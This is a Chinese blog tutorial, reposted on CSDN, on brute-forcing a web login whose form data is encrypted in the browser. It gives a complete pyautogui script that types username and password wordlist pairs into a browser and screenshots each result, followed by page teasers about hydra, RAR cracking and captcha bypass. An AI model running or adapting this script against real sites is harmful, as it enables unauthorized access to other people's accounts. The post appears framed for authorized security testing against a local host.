python网站登录爆破登录_会python真的可以为所欲为——爆破前端加密登录

最新推荐文章于 2022-10-29 20:30:47 发布
最新推荐文章于 2022-10-29 20:30:47 发布
阅读量307 收藏 1
点赞数
文章标签: python网站登录爆破登录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42404710/article/details/114458509
版权

做安全测试的时候经常会遇到前端登录数据包加密,又懒得去分析js看加密算法,特别一些做了混淆的,分析起来那叫一个恶心……

逼的我又拿起了python,开始一顿操作

0e6e3b012a55

python真的能为所欲为

基础知识

这次要用到的是一个叫pyautogui的库,在python2的环境下安装很简单

python -m pip install pyautogui

然后在命令行测试一下是否能引用

0e6e3b012a55

image.png

没毛病,接下来简单介绍一下pyautogui

简单来说,这个库可以用来模拟鼠标、键盘操作

我们要用到的有

获取当前鼠标位置

pyautogui.position()

鼠标左击

pyautogui.click(x=123, y=456)

鼠标双击(按两下左键)

pyautogui.doubleClick(x=123, y=456)

鼠标左键按下

pyautogui.mouseDown(x=123, y=456)

鼠标左键松起

pyautogui.mouseUp(x=123, y=456)

键盘写入文本

pyautogui.typewrite('http://www.baidu.com\n')

# 这里的 '\n'是换行,其他特殊按键请自行查找手册

截屏

pyautogui.screenshot('log/test.png')

每次操作间隔时间

pyautogui.PAUSE = 0.2 #单位 秒

差不多了,这些基本够我们用了,接下来开始造轮子

python大法好

分析一波流程

首先,我们在运行脚本的时候,肯定是命令行获取的焦点,而不是浏览器,所以第一步就需要打开浏览器,为了方便可以提前打开一个,通过点击底部任务栏来切换到浏览器

0e6e3b012a55

image.png

然后每次先输入地址,然后输入用户名,输入密码,点击登录按钮

输入地址,可以在浏览器地址栏右侧按下左键,然后移动到地址栏最左侧,然后再输入文本,带上'\n'就可以转到指定的页面了

输入用户名,这块可根据具体页面的文本框采用单击或双击的办法清空或选中用户名栏的文本

输入密码,同用户名

点击登录,鼠标移动到登录按钮然后左击

等待http响应后(自己根据网络速度估摸一个大致时间),截屏到指定目录

如此循环

代码如下:

#!/usr/bin/python2

import pyautogui as pag

import time

pag.PAUSE = 0.2

def clearChar(chars):

reStr = ['\n','\r','\t',' ']

for reS in reStr:

chars = chars.replace(reS, '')

return chars

class Point:

x = 0

y = 0

def __init__(self, x, y):

self.x = x

self.y = y

def autoCrack(username, password):

global userBox

global passBox

global submitBtn

global urlBoxRight

global urlBoxLeft

global loginUrl

pag.mouseDown(urlBoxRight.x, urlBoxRight.y)

pag.mouseUp(urlBoxLeft.x, urlBoxLeft.y)

pag.typewrite(loginUrl+'\n')

time.sleep(1)

pag.click(userBox.x, userBox.y)

pag.typewrite(username)

pag.click(passBox.x, passBox.y)

pag.typewrite(password)

pag.click(submitBtn.x, submitBtn.y)

time.sleep(3)

pag.screenshot('log/{}_{}.png'.format(username, password))

time.sleep(1)

if __name__ == '__main__':

# Point

chromeIcon = Point(988, 1778)

userBox = Point(2524, 600)

passBox = Point(2530, 706)

submitBtn = Point(2468, 852)

urlBoxRight = Point(2052, 74)

urlBoxLeft = Point(150, 68)

loginUrl = 'http://127.0.0.1/login.php'

userFile = 'user.txt'

passFile = 'pass.txt'

pUserFile = open(userFile, 'r')

pPassFile = open(passFile, 'r')

userList = pUserFile.readlines()

passList = pPassFile.readlines()

pUserFile.close()

pPassFile.close()

pag.click(chromeIcon.x, chromeIcon.y)

for pwd in passList:

pwd = clearChar(pwd)

for user in userList:

user = clearChar(user)

autoCrack(user, pwd)

看看实际效果

0e6e3b012a55

image.png

伽月
关注
OpenCV-Python实战(1)——OpenCV简介与图像处理基础
盼小辉丶的博客
08-10 22万+
OpenCV 是一个的跨平台计算机视觉库,可以运行在 Linux、Windows 和 Mac OS 操作系统上。它轻量级而且高效——由一系列 C 函数和少量 C++ 类构成,同时也提供了 Python 接口,实现了图像处理和计算机视觉方面的很多通用算法。在本文中,将介绍 OpenCV 库,包括它的主要模块和典型应用场景,同时使用 OpenCV-Python 实战讲解图像处理基础要点。
python登录网页账号密码,python网站登录爆破登录
最新发布
降AIGC工具
04-28 366
大家好,本文将围绕python登录网页账号密码展开说明,python网站登录爆破登录是一个很多人都想弄明白的事情,想搞清楚python网站登录编程题需要先了解以下几个事情。在现代网络应用中,模拟登录是一项常见的任务。通过模拟登录,我们可以自动化执行各种操作,如访问个人账户、爬取数据或执行特定的任务。接下来,我们需要获取登录页面的HTML内容,并解析出登录所需的表单数据。本文将介绍如何使用Python来实现网站的模拟登录,并提供相应的源代码。首先,我们需要导入所需的Python库,包括。库解析HTML内容。
python真的可以为所欲为——爆破前端加密登录
公众号:Python研究者
09-08 390
关注公众号:Python爬虫数据分析挖掘,回复【开源源码】免费获取更多开源项目源码 做安全测试的时候经常遇到前端登录数据包加密,又懒得去分析js看加密算法,特别一些做了混淆的,分析起来那叫一个恶心…… 逼的我又拿起了python,开始一顿操作 python真的为所欲为 基础知识 这次要用到的是一个叫pyautogui的库,在python2的环境下安装很简单 python -m pip install pyautogui 然后在命令行测试一下是否能引用 image..
python网站登录爆破登录_用python爆破网站
weixin_42360788的博客
02-04 772
暑假在家上网,qq群里一位好友给我说他想要某个网站员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
python网站登录爆破登录_看我如何爆破加密的web登录表单
weixin_39915078的博客
12-17 729
有很多方法来爆破登录表单,你只需要 google 一下就可以在搜索的结果中看到一些通常的做法。在你使用 Burp 的情况下,这些搜索出来的爆破方式将足以满足大多数的形式爆破。但有时候,爆破那么简单,你需要编写自己的工具。这可能是因为一些各种原因所致,但通常它归结为通过 HTTP(S)的自定义协议或输入的数据的是一些自定义的加密算法。在这篇文章中,我们将介绍两种编写这些工具的方法:1. 编写你自...
python登录判断用户名和密码_第一个python程序-判断登陆用户名和密码是否正确...
weixin_39595164的博客
12-05 3693
#setencoding=utf-8#用户名和密码输入正确,则登陆成功#用户名正确密码错误,只再输入密码,有3次机#错误3次,则把用户名放入lock中import os,sys#存放用户名和密码的文件是E:\python\user.txtaccounts_file = 'E:\\python\\user.txt'#被锁的用户要写入此文件lock_file = 'E:\\python\\lock...
Python中__init__的用法和理解
热门推荐
luzhan66的博客
09-23 15万+
Python中定义类经常用到__init__函数(方法),首先需要理解的是,两个下划线开头的函数是声明该属性为私有,不能在类的外部被使用或访问。而__init__函数(方法)支持带参数类的初始化,也可为声明该类的属性(类中的变量)。__init__函数(方法)的第一个参数必须为self,后续参数为自己定义。 从文字理解比较困难,通过下面的例子能非常容易理解这个概念: 例如我们定义一个Box...
利用Python暴力破解rar加密文件
06-05
利用Python暴力破解加密rar文件。 按住win+x选择Windows Powershell 管理员 输入 python .\ berar.py .\ 文件名.rar
Python-密码爆破
weixin_57041250的博客
10-29 983
有密码的地方 均可使用爆破。但前提是登录无限制。
验证码识别 登陆 爆破 暴力破解 工具F-Login F-Verify
04-19
验证码识别 登陆 爆破 暴力破解 工具F-Login F-Verify,国内安全团队开发的验证码识别工具,能够识别验证码并实现密码爆破
只用20行Python代码就攻破了网站登录
公众号:Python研究者
03-12 1912
大家好,我是辰哥~今天教大家用Python代码攻破网站登录(在测试靶机上进行实验),原理上是抓包和改包,如果学过的爬虫的话,相信你快看懂这篇文章测试靶机为DVWA,适合DVWA暴力破解模...
Python 爆破web登录实验笔记
m0_60823533的博客
05-15 1228
总体原理:多次发送密码尝试穷举爆破 具体流程分析: 1.抓取web发送账号密码数据接口 2.自动识别验证码 3.获取到密码和验证码结果,通过python模拟无限次发送 4.分析返回结果 详细流程: (1).抓取web发送账号密码数据接口 网站登录界面示例: 通过抓取提交数据接口发现有用户名,密码,验证码三个数据,这里需要分析第三个数据怎么获取,直接打开云代码查看,看到了获取验证码的接口! 但是经过测试始终提示验证码错误,又回来分析验证码接口,终于反复查看发现这
使用python登录密码爆破
nethm的专栏
09-17 3069
运行后的结果: send the request to get the init user token, respons state code = 200 response page size= 4979 we will use bruteforce way to get the correct password by using dictionary paylo ad
python爆破示例_用python爆破网站
weixin_33335559的博客
01-12 680
暑假在家上网,qq群里一位好友给我说他想要某个网站员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
登录密码爆破
gl620321的博客
08-11 6117
一、登录密码爆破 1.登录猜解猜解用户密码爆破属于撞库一类。通过弱口令字典暴力尝试登陆达到猜解用户密码。 2.一般登陆都要验证码,而突破验证码主要有两种: 绕过严重码 自动识别验证码 管理院权限登陆 开启了session,随机生成了一串字符串 查看登陆检测,判断是否开启传输了三个post 存在的话去判断验证码 验证码要是和session的不同,它就回到login这个页面 匹配的话,...
在线密码破解教程,web登录爆破(hydra的简单使用)
weixin_43039349的博客
04-16 13万+
hydra是一个极其强大的在线破解密码的工具(人称爆破神器) ——本文献给无聊的计算机系大学生们 密码破解从大类来分可以分为两种,一种是在线破解,这种方hydra式一般要求待破解的对象对我们来说是可以正常提供服务的,通俗来讲就是能够让我们通过一定的途径去尝试登录,或者是验证用户密码的正确性。而另一种就是本地破解,比如wifi抓包破解wifi密码,只要提前抓到了wifi登录验证的数据包,就可以在本地...
Python+selenium绕过前端js加密暴破登录
weixin_45605352的博客
08-02 1745
0x00 前言 有时在暴破登录框时,密码字段被加密了,不知道加密算法的话对暴破的进行产生障碍,下面有几种解决方法. 分析前端 js 加密脚本,了解加密过程后用编程,\语言重写,将密码本加密后暴破. ...
python编写字典爆破网站登录|思路
向阳-Y.的博客
10-31 1723
在做渗透时,因为太菜了,不用网上的爆破工具,自己就即兴写了一个简单的字典爆破。新手小白可以借鉴思路,就当学习了。大佬请绕道!! 如果有好用的爆破工具,欢迎大佬推荐~
Python自动化登录淘宝并持久保存cookies详解
在1.0版本的基础上,作者针对实际应用中的不便——每次程序运行后登录cookies丢失的问题,提出了Python 2.0版本的改进。2.0版本的关键创新在于引入了cookies的序列化机制。通过序列化技术,登录后的cookies被保存到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值